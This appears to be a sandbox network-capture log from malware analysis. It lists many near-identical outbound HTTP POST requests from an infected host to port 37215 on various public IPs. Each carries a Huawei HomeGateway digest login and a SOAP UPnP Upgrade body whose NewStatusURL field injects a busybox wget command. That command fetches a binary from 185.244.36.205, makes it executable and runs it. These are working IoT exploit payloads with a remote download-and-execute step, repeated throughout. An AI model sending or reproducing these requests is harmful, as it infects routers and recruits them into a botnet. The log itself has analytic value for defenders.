                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1573192.168.2.154879841.104.193.2837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644959927 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1574192.168.2.155813437.146.106.2037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644968033 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1575192.168.2.1551200121.2.164.7537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644975901 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1576192.168.2.1559018121.53.52.13337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645009995 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1577192.168.2.1556348186.15.67.19837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645013094 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1578192.168.2.1545964222.172.138.10037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645035982 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1579192.168.2.1537234138.118.160.22337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645068884 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1580192.168.2.155670445.150.175.2437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645068884 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1581192.168.2.155493237.83.26.22637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645100117 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1582192.168.2.155631845.11.114.19537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645101070 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1583192.168.2.1546288190.23.204.22737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645137072 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
